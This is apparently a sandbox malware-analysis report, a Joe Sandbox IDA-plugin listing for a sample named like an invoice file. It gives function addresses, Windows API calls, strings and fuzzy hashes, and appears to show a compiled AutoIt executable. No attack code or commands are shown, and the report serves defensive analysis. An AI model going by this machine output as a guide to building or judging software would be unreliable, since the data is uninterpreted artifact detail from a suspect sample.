                                                                                                                  • Part of subcall function 004B7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0054AC68,00000FA0,?,?,004B7B51,004B5E77,00546C70,00000014), ref: 004B7E41
                                                                                                                • __mtterm.LIBCMT ref: 004B7B55
                                                                                                                  • Part of subcall function 004B7BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004B7D3F
                                                                                                                  • Part of subcall function 004B7BBD: _free.LIBCMT ref: 004B7D46
                                                                                                                  • Part of subcall function 004B7BBD: RtlDeleteCriticalSection.NTDLL(0054AC68), ref: 004B7D68
                                                                                                                • __calloc_crt.LIBCMT ref: 004B7B7A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004B7BA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2942034483-0
                                                                                                                • Opcode ID: 6cc25b163431a8d5183549f5598ee6f8470d497cd79ce0d25a656b53c565aa61
                                                                                                                • Instruction ID: ecee7eebfd3a2e4fd107da6f6825dff911204f93890ab9269623e7a2b1edde23
                                                                                                                • Opcode Fuzzy Hash: 6cc25b163431a8d5183549f5598ee6f8470d497cd79ce0d25a656b53c565aa61
                                                                                                                • Instruction Fuzzy Hash: 77F0963214D31119E76877757C06ACB2694DF8273CB20069FF864D52D2FF2C9942597D
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0049281D
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00492825
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00492830
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0049283B
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00492843
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049284B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: 9b53cd075a24e8ed8bdffc65940050c0e50597592151d7c52f2935a742c8ee9e
                                                                                                                • Instruction ID: 8a09c1db04b17d8cabe042e1c1c52dfde04ed2f975bd89169c9ed6d3143fc178
                                                                                                                • Opcode Fuzzy Hash: 9b53cd075a24e8ed8bdffc65940050c0e50597592151d7c52f2935a742c8ee9e
                                                                                                                • Instruction Fuzzy Hash: FE0167B0902B5ABDE3009F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A868CBE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1423608774-0
                                                                                                                • Opcode ID: 9ca4dac0bd4c47c6f4774f3a0d8721e6a7abaae3bef536eddd12febb1ce4eda7
                                                                                                                • Instruction ID: db399a48c4be2609852f4bc28372d16077933a3cab1bea6035ed39dc7590d39f
                                                                                                                • Opcode Fuzzy Hash: 9ca4dac0bd4c47c6f4774f3a0d8721e6a7abaae3bef536eddd12febb1ce4eda7
                                                                                                                • Instruction Fuzzy Hash: 8D018136202222ABDB191B54EC58EEB777AFF98701B04452BF513D23A0DB789C04EB64
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004D7C07
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004D7C1D
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 004D7C2C
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004D7C3B
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004D7C45
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004D7C4C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: c355f21ed7f91aa2fc6e106322e09523d7993cb2f79a793ca54fd615e653fc7e
                                                                                                                • Instruction ID: 50aeb86a4dce37b7f6ae4011f5677e4f270ac749f902bf6b2fadce5a9e99a7c4
                                                                                                                • Opcode Fuzzy Hash: c355f21ed7f91aa2fc6e106322e09523d7993cb2f79a793ca54fd615e653fc7e
                                                                                                                • Instruction Fuzzy Hash: 39F09A72241158BBE7201B529C0EEEF3B7CEFD6B11F004019FA0191050E7A41A49E6B5
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 004D9A33
                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 004D9A44
                                                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00505DEE,?,?,?,?,?,0049ED63), ref: 004D9A51
                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00505DEE,?,?,?,?,?,0049ED63), ref: 004D9A5E
                                                                                                                  • Part of subcall function 004D93D1: CloseHandle.KERNEL32(?,?,004D9A6B,?,?,?,00505DEE,?,?,?,?,?,0049ED63), ref: 004D93DB
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 004D9A71
                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 004D9A78
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 7ce8c73f8e575877ac3acba91d067c99a54dadb6f5ca011313a38e88eb38ec86
                                                                                                                • Instruction ID: 86b9ff146701e89e49feeeea50b1d31d8c32f094b93d7148f97709083a30293e
                                                                                                                • Opcode Fuzzy Hash: 7ce8c73f8e575877ac3acba91d067c99a54dadb6f5ca011313a38e88eb38ec86
                                                                                                                • Instruction Fuzzy Hash: 54F08236141211ABD7111BA4EC8DDEF777AFF98301B144526F523D22A0DB799C05EB70
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AF4EA: std::exception::exception.LIBCMT ref: 004AF51E
                                                                                                                  • Part of subcall function 004AF4EA: __CxxThrowException@8.LIBCMT ref: 004AF533
                                                                                                                • __swprintf.LIBCMT ref: 00491EA6
                                                                                                                Strings
                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00491D49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                • API String ID: 2125237772-557222456
                                                                                                                • Opcode ID: 5767c3bdee235b5a274b0ecbc7da8876c43910e332d8f308e528b22721073a67
                                                                                                                • Instruction ID: 7ad9100a1eff3fc6db5ae7fbb4a1fcd7059a0d00c51955895d8a83c392be742e
                                                                                                                • Opcode Fuzzy Hash: 5767c3bdee235b5a274b0ecbc7da8876c43910e332d8f308e528b22721073a67
                                                                                                                • Instruction Fuzzy Hash: AC91AF71104201AFCF24EF25C895C6EBFA4BF86704F00492EF885972A1DB74ED05CB96
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004EB006
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 004EB115
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004EB298
                                                                                                                  • Part of subcall function 004D9DC5: VariantInit.OLEAUT32(00000000), ref: 004D9E05
                                                                                                                  • Part of subcall function 004D9DC5: VariantCopy.OLEAUT32(?,?), ref: 004D9E0E
                                                                                                                  • Part of subcall function 004D9DC5: VariantClear.OLEAUT32(?), ref: 004D9E1A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: 456fe3b623c6c03858777a066329cc91e47b13ff2fb343c1f35d6d5103380235
                                                                                                                • Instruction ID: 6fd8e24457408158f8a13d847103116bf5f89014a3fea2a5349e6cf157ed87d0
                                                                                                                • Opcode Fuzzy Hash: 456fe3b623c6c03858777a066329cc91e47b13ff2fb343c1f35d6d5103380235
                                                                                                                • Instruction Fuzzy Hash: 8A917B346043419FCB10DF66C49595BBBE4EF89704F04486EF88A9B361DB35ED05CB96
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AC6F4: _wcscpy.LIBCMT ref: 004AC717
                                                                                                                • _memset.LIBCMT ref: 004D5438
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 004D5467
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004D5513
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004D553D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: 624a2dc21d7876e1bf3b45df2ea2a4aca0ccb066e952b366423b993c28eb57c2
                                                                                                                • Instruction ID: 9c5b6ee8fb9267d7dcb9f24a45fa283ab711035088389b91ee9a90453d0b4d84
                                                                                                                • Opcode Fuzzy Hash: 624a2dc21d7876e1bf3b45df2ea2a4aca0ccb066e952b366423b993c28eb57c2
                                                                                                                • Instruction Fuzzy Hash: C6513231204701ABD7159F28D8647ABBBE9EF95354F04062FF895C3390DF68CD448B5A
                                                                                                                APIs
                                                                                                                • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004D027B
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004D02B1
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004D02C2
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004D0344
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: 5d0ae4bedae08c50cce91389e09ae840595d135b650fa5f212e2ba7cb7b0b28f
                                                                                                                • Instruction ID: c1897990c14fe612effaba70ce89e6404e1fa164fa338b59ff0788ff0921234d
                                                                                                                • Opcode Fuzzy Hash: 5d0ae4bedae08c50cce91389e09ae840595d135b650fa5f212e2ba7cb7b0b28f
                                                                                                                • Instruction Fuzzy Hash: 67414A71600204AFDB09CF64C8A5B9A7BB9EF44314F1480ABED099F306D7B9D945CBA4
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004D5075
                                                                                                                • GetMenuItemInfoW.USER32 ref: 004D5091
                                                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 004D50D7
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00551708,00000000), ref: 004D5120
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: 852bc1ee173de16cbf24b752f00a1b26b8305ef7b3f793407c3984fe698f56fc
                                                                                                                • Instruction ID: 936e9bb61eaba3086aa0ff05ac023a240f2d292e985d76c9ea0fdb1333633852
                                                                                                                • Opcode Fuzzy Hash: 852bc1ee173de16cbf24b752f00a1b26b8305ef7b3f793407c3984fe698f56fc
                                                                                                                • Instruction Fuzzy Hash: 9341AE316047019FD7209F29D895B6BB7E8AF85318F044A1FF89597391DB38E804CB6A
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 004F0587
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 2358735015-567219261
                                                                                                                • Opcode ID: 3637e32f593a877e807c28eb39dfcf6bee2722033767ac90a458546ec6c33746
                                                                                                                • Instruction ID: db8da1af815b0d2d86fd1eaf058fba4aae1f9d31bee959082a7f2f46053a4af8
                                                                                                                • Opcode Fuzzy Hash: 3637e32f593a877e807c28eb39dfcf6bee2722033767ac90a458546ec6c33746
                                                                                                                • Instruction Fuzzy Hash: 6F31C17050021AABCF00EF55C9519FEB7B4FF95318B00862FE826A72D2DB79A905CB84
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004CB88E
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004CB8A1
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 004CB8D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 3850602802-1403004172
                                                                                                                • Opcode ID: f781da45fd470c0f257e215107aeddbbdb94d5acf362f0378d6e02f2f5d6072a
                                                                                                                • Instruction ID: 27d0801f30e5840b64e2cb8857845dbd71b76089f9e69383c4ad2cee4c380ce4
                                                                                                                • Opcode Fuzzy Hash: f781da45fd470c0f257e215107aeddbbdb94d5acf362f0378d6e02f2f5d6072a
                                                                                                                • Instruction Fuzzy Hash: 8F21D27A900108BEDB44ABA5D887EFF7B78DF16358F10412EF411A21E1DB785D0A97B8
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004E4401
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004E4427
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004E4457
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004E449E
                                                                                                                  • Part of subcall function 004E5052: GetLastError.KERNEL32(?,?,004E43CC,00000000,00000000,00000001), ref: 004E5067
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1951874230-3916222277
                                                                                                                • Opcode ID: 37bd158c5d3dc03492a1d8067bab3bee08fa97e2508e2320ecb9bff8cbac8eae
                                                                                                                • Instruction ID: b7110b8c4d3d56bc84447c8acdc10ae9d79fa27200705bf05f98cbce09c0c714
                                                                                                                • Opcode Fuzzy Hash: 37bd158c5d3dc03492a1d8067bab3bee08fa97e2508e2320ecb9bff8cbac8eae
                                                                                                                • Instruction Fuzzy Hash: 722180B1600248BFE7119F96CC85FBB77FCEB88759F10851BF205D2280EA689D059775
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004AD1BA
                                                                                                                  • Part of subcall function 004AD17C: GetStockObject.GDI32(00000011), ref: 004AD1CE
